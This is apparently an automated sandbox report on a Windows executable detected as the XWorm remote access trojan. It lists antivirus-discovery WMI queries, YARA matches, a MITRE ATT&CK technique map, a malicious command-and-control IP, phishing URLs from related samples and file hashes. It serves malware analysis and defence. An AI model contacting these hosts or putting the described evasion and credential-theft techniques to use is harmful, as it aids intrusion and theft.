Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: 1.exe, 00000000.00000002.3122041268.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3120059123.0000000001355000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3122041268.00000000065AF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3122041268.00000000065C2000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3120059123.00000000013DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.1.exe.61d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.61d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.exe PID: 7804, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.1.exe.61d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.61d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.exe PID: 7804, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	21 Input Capture	2 System Time Discovery	Remote Services	21 Input Capture	1 Encrypted Channel	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	11 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	25 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1.exe	18%	Virustotal		Browse
1.exe	13%	ReversingLabs

Source	Detection	Scanner	Label	Link
45.207.215.58	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.207.215.58	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.9.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	1.exe, 00000000.00000002.3121287747.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.207.215.58	unknown	Seychelles		135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583226
Start date and time:	2025-01-02 09:00:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/6@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 38 Number of non-executed functions: 352
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.107.246.45, 20.12.23.50, 40.126.32.133
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:01:10	API Interceptor	3646365x Sleep call for process: 1.exe modified
03:04:00	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.207.215.58	mIba7sY5sD.elf	Get hash	malicious	Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	installer64v7.1.0.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	hcxmivKYfL.exe	Get hash	malicious	RedLine	Browse	13.107.246.45
	01012025.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26desusertion%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://t.co/YjyGioQuKT	Get hash	malicious	Unknown	Browse	13.107.246.45
	installer64v9.3.4.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	TieLoader.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://password-changes.phishwall.net/XMzUzaXgwTnBGZU9XbU9kQnFIZk0vQ3hhQlNtUXJwaExCOTNDYnhpMG92ZHRNQjI5SHhmNUlLTC9JcmVVS2sraDgvUVZtd2YwVFROeGxlbDR0UXBkeGJOUkN3UGliUUNGVHZXWVJ2ek5hZ0FNV290djROWFRxN3JNazM1WlhNOUVLdnlqOEVlbXFaaFROMlltRDFFKzhmU3A0eEl4cE1tMFJmazVYOE5hc25oTjNIR0Q1UzJyNW5wTkNBPT0tLUdCVnp5RnltanNuQnVQWkgtLVA0Uy9TcENHeDltOGdwd282cnZiaEE9PQ==?cid=2317630324	Get hash	malicious	HTMLPhisher, KnowBe4	Browse	13.107.246.45
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	over.ps1	Get hash	malicious	Vidar	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	154.216.17.216
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	154.216.18.62
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	154.216.17.216

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1.exe_b4875fa730115e8f659ce4953b9a1f24949c8429_e30e42de_bb8db5a2-0d19-40a3-965b-a5cc56dcaee2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2677870754178115
Encrypted:	false
SSDEEP:	192:4Yl64/rJ2N0BU/HKPjyEjZr4F4XFBCzuiFZZ24IO8zRJ:dl64rJ/BU/4jfVBCzuiFZY4IO8L
MD5:	4BA20014361B542AA6AAD997E50C4C83
SHA1:	2E7B00AC1B9E0B44CBB04BF3F916E02CDD8FEC74
SHA-256:	9B41AA16A993931024B45980F6A512934053E20038A7CBED6391BDC69B867F27
SHA-512:	C929802261B452D92290C4FF33D2D61C383320DCD8560B5E8064E9802DD30522BA8D227AF6A8B6ECEFF4EE3FEFD00AB2DEAFEE31D9ADBAB3645339E42E69E159
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.2.7.8.6.1.2.4.3.9.5.7.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.2.7.8.6.1.3.1.7.3.9.4.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.8.d.b.5.a.2.-.0.d.1.9.-.4.0.a.3.-.9.6.5.b.-.a.5.c.c.5.6.d.c.a.e.e.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.1.8.8.b.3.6.-.7.d.5.0.-.4.8.d.2.-.b.9.d.b.-.0.3.e.f.3.d.9.b.a.b.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.F.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.c.-.0.0.0.1.-.0.0.1.4.-.0.0.3.8.-.3.3.7.7.e.c.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.d.e.b.4.7.4.7.a.8.f.c.0.7.9.b.a.f.f.9.0.4.0.8.d.e.3.f.d.3.c.6.0.0.0.0.0.4.0.8.!.0.0.0.0.e.6.e.6.2.7.4.4.4.c.3.f.4.8.6.e.3.c.4.a.a.7.3.7.b.9.6.8.d.c.e.1.3.2.8.1.f.9.e.7.!.1...e.x.e.....T.a.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E6A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jan 2 08:03:32 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	342521
Entropy (8bit):	3.616612457405982
Encrypted:	false
SSDEEP:	3072:IjuyOfXapWtKaQyykk4uEq6mKhLTgwWKpKn1yO2OqD28:IGAaQyykk4K8TgMcO
MD5:	0E0D16D1822E996151C761ED1C1AC63C
SHA1:	D2225DF7F8F1676DCB723E0CC5C54C557175D401
SHA-256:	BDE5A95579F28B8D3792BD1AD6DADB4035C895828DA6791EA68A4F5CD0431C47
SHA-512:	091CBC8A50072B25F88C33BC95223A0DF3116DD82D43CA319473AE52AE7FC977C3DA8B403BF3549F2557B686A7C7F3AAD713F5FB52D3052C38FDD911275D92B9
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......THvg............d............"..l........)...n..........T.......8...........T............O..9............-..........................................................................................eJ......./......GenuineIntel............T.......\|....Gvg....?........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6040.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8378
Entropy (8bit):	3.691224081869112
Encrypted:	false
SSDEEP:	192:R6l7wVeJtBV6XY6YcD2SURgmfZ5QTprX89b2osfAym:R6lXJ56XY6YxSURgmfgm2bfE
MD5:	87A02AAB6E0C2D67B30FCB9B3152FA7E
SHA1:	E9B84F67D5973AEFD46212F2422EC65C57CD463D
SHA-256:	B36DFDCDBFB8157E25E684AD04F15916AECAB6076451EB0968512DA24A62FF35
SHA-512:	77C92733CA7270055702666CB6E7276A2535F116F77921421CE4DCD9351AD946F717F3C164997D3527674BEF46CDDB2CF819415EB6FF285A3A2E2EB48969DA96
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6070.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.435487265514861
Encrypted:	false
SSDEEP:	48:cvIwWl8zs3Jg77aI90vWpW8VY2Ym8M4Jgi+F9+q8vNiJN0UDzLuad:uIjfZI7W+7ViJYK+N0UDzSad
MD5:	BB6556643CFCA1A5EFD21C487676BEFF
SHA1:	15D607E2886952F8DD1C1577C8A429751F77B6CC
SHA-256:	AB33B35F0EEE946E8C891684F9FB15B7D854C6900C56B5A974D078B66306D8A6
SHA-512:	62C323DB27AE89AD1F068C61F325C304A6301956266996C5945EA38280FE5BF4C5B40EC1401279590E03BBBB0CDA747BAE14B04A71154A69CEE0CBE736B85CBE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658026" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].bin

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.603751335007202
Encrypted:	false
SSDEEP:	1536:QQC7fxoqhNc4aV52DmlW1CIIqA8jkY2ZRRLM6eKXBwLsy1ETqfvu+P4Rtsj5o:qfxoqhjA5imlW1CIIpMRKXBwLs/
MD5:	6FAFF9BCB72CD859A6B490A998AEC10A
SHA1:	F97F98ADDBDF3CF7E529ACA1FADA3628A770EDC7
SHA-256:	5929CD8F4B4BE8BC6B9CBFA07A53F04A0B17290EFBD6DB1F982307718D6F698F
SHA-512:	4FD6D9CA825DC5AAEAD8C846C72301A42B14BDB7AE543B0C46378DFA2384C3215D800AFADF2E81A386F000EE554D6C23E4F82C5DB799680A903B991C49E7A3A7
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].bin, Author: unknown
Reputation:	low
Preview:	.......J...`....T....o...m....j.."bDB.....(.W#.k.5.iQ..=&+..."e...y.A..K.7`qd.L../6eh..........z@6^.,?....(.b...M..aSG'.$..".y..kP=f....jb....0..Or.r8....c.0#.P..~.Hv.A...d...s.&.m.0..H.."[.1...`M..........\.;I..8O.}.......Y.O&....}.....2..F.\.V...(...v.p..4....).t.A.........A.%U..x.F..H..'.=....,.........................................................................................................................................................................................................................................................\|KM..;..H/..VJ..<.~.2~..T..T=p.t4...#.._E#.p.V.....1....X/A....u.5...+.P..z\q 9.,..Km...L.9.....Z..5..]zm...w.cq\|..._F...c).w.i...m.....#.Cu...._.28.S\|..N.....Y......3.1..x..y.=\|Z.0oM..Qz....2Q.6}..L.....R.+..>....'I...q.S.;..m.:D,....X.#.m.....!7....4U%..0..S.e.&^<....P..t."B..7Y.F.O}k..#..\H...#.v\g.^.\|\|..>.....q7.UVIy. .(.@...Z._@xO~..C...........6....lP.}..n6.c..8.....m.f.\Q.,..N.Bv.Z_6,...fG..*\|e.R.9..W.C.T..=

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.394048487712794
Encrypted:	false
SSDEEP:	6144:3l4fiJoH0ncNXiUjt10q7G/gaocYGBoaUMMhA2NX4WABlBuNDROBSqap:14vF7MYQUMM6VFYVRU
MD5:	24551C4DE41DD9BBB0999461E8F2B808
SHA1:	7A2005CA59D9918956677966054A72D0EFAC0F10
SHA-256:	69C7C5DB3F1E612A47B9577111042C16374AFD044FDC6C7A3F5983FEFD8F4AA8
SHA-512:	B66109C62DEDC0F2251C9D96EC568C23C54E612087C6FB737CF2AFC91DE2249A9D8BBD9CA8E3D54E913E4C140A7C1EADD2ADB10D154462E8B5B93737553703BE
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2....\..............................................................................................................................................................................................................................................................................................................................................x...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.4592387112309595
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1.exe
File size:	1'684'480 bytes
MD5:	47f8252df69f15858c9ebb9e27ee2201
SHA1:	e6e627444c3f486e3c4aa737b968dce13281f9e7
SHA256:	4c1d652ffdc56aca82dec4b51da8a0a27f8bc5aa248b5cdebf07760f2806d0b6
SHA512:	4b98e1f48966cc8a3e8eee0b011843d962636f68615a2f782db53cd42189497abe207521d5a4ff6d4c2ad32af625ea42a2d9fe925c8cd4b2236331a12f9e6186
SSDEEP:	49152:gn+ujf6aPPy0hYIZ7zh0fNg6RSE7wa2Z4NaxxJwG7lOO5paAeL5N:yTf6aDhYIZh0O6RSE7wa2Z4Na5paAeL
TLSH:	AB75AE3E79A18076C1323570825EA3BAF3ADD9304D78167767901E3D2EB54C2992C7AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~..<:..o:..o:..oU.}o...oU.Io...oU.Ho...o3.`o5..o3.po...o:..o+..oU.Lo9..oU.yo;..oU.~o;..oRich:..o................PE..L.....Yg...

File Icon


Icon Hash:	9e1f191f6777733a

Static PE Info

General

Entrypoint:	0x4f6b0d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6759AD12 [Wed Dec 11 15:17:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	b9c2c7077962fb70b1db2a37ecb3cada

Entrypoint Preview

Instruction
call 00007FF5BD42B158h
jmp 00007FF5BD42105Eh
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
je 00007FF5BD4211FFh
